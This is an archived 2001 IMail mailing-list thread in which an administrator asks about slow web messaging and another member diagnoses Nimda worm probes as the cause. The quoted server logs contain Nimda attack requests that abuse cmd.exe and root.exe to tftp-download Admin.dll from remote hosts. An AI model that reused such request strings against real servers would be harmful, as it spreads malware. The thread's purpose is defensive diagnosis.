Scott and everyone else that replied, Thanks for your input. At least now I feel like I know exactly what's going on. We changed the port to Web Messaging which seems to be the only real solution for now. It still would be nice for Imail's web server to have the ability to filter these types of things like you can with IIS, but oh well... I've been working on this for 3 days straight now so it's good enough for me. Thanks to everyone,
Charles Short [EMAIL PROTECTED] Systems Administrator Orotech Web Services http://www.orotech.net 910.350.7980 voice 910.350.7976 fax ----- Original Message ----- From: "R. Scott Perry" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Cc: "Charles Short" <[EMAIL PROTECTED]> Sent: Friday, September 21, 2001 10:47 AM Subject: Re: [IMail Forum] DoS Attack on IMail Web Messaging?? HELP! > > > We started seeing problems on Tuesday like everyone else, but we are > > running IMail on a server by itself... No IIS. I am seeing a lot of > > malformed header requests in the logs like the Code Red I & II virus does > > to IIS servers ... > > >20010918 111401 208.180.242.21, , , GET > >/scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.d ll > >HTTP/1.0 > > This is from the Nimda virus. Computers that get infected with it will > connect to pseudo-random IPs, and if there is a web server on them, will > try a dozen different IIS hacks. The fact that you are not running IIS > doesn't make a difference; Nimda doesn't care about wasting bandwidth and > other resources just because you aren't running IIS. > > >and -- this is the odd part -- some BRO*.tmp files in my spool directory > >that are most definitely being caused by people browsing WebMail. > > That's normal. IMail will create those files for web requests, such as the > ones that Nimda is making. > > > It is causing web messaging to crawl, but other than that I have not > > seen what everyone else seems to be seeing with the Nimda virus. No other > > characteristics of the Nimda virus at all. I honestly do not believe that > > we have been infected... > > You are not infected, you are just being attacked by other servers that are > infected. > > >20010918 111401 208.180.242.21, , , GET > >/scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.d ll > >HTTP/1.0 > >20010918 111401 208.234.121.72, , , GET > >/MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll > > HTTP/1.0 > >20010918 111401 205.218.122.146, , , GET > >/c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll% 20d:\Admin.dll > > > > Note that these are all coming from different IP addresses. It's not > because of a problem with your server. > > > When I called the other day the assumption was that it was the Nimda > > virus and the Ipswitch support guys said to run a virus program and > > reload the web template files to fix it and that has done nothing at all > > to help. > > Ipswitch does seem to be pretty clueless about viruses (but, that's OK, > since they aren't in the AV business). They don't seem to realize that few > (if any) viruses attack try to break back into the same machine they are > running on. > > > I even went ahead and made the upgrade from 6.06 to v.7.03 Wednesday > > night and no progress. > > That won't do any good. That's like buying a new telephone to try to get > rid of crank calls. > > > I have all of the virus definitions for Norton and I've done SEVERAL > > system scans with Norton, House Call and the FIX_NIMDA.EXE program from > > Trend Micro and all came up empty handed. I just can't believe that the > > Nimda has gotten into our system... > > It hasn't. You're just getting hit from other servers. > > >Is anyone else seeing these BRO*.tmp files or is it just me? > > Yes, anyone running IMail's web server on port 80 will see a large increase > in those files when Nimda-infected computers connect to theirs. > > > This seems to be a problem specific to IMail's Web Messaging program > > not properly filtering out these malformed request. > > No, it is simply sending the logon page that it is designed to return when > a bad URL is given. > > >When Web Messaging is off, the server runs like a dream. It is one thing > >to patch an IIS server with a patch from the product vendor, but I > >honestly don't have a clue as to what else I can do to stop this DoS > >attack from happening on my IMail box without implementing a firewall > >system for that server. > > That's what you have to do. No software can prevent a DoS attack that is > simply flooding the server with requests. > > -Scott > --- > Declude: Anti-virus, Anti-spam and Anti-hijacking solutions for > IMail. http://www.declude.com > > > Please visit http://www.ipswitch.com/support/mailing-lists.html > to be removed from this list. > > An Archive of this list is available at: > http://www.mail-archive.com/imail_forum%40list.ipswitch.com/ > ______________________________________________________________________ The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc. Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED] Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4 To Manage your Subscription......... http://humankindsystems.com/lists
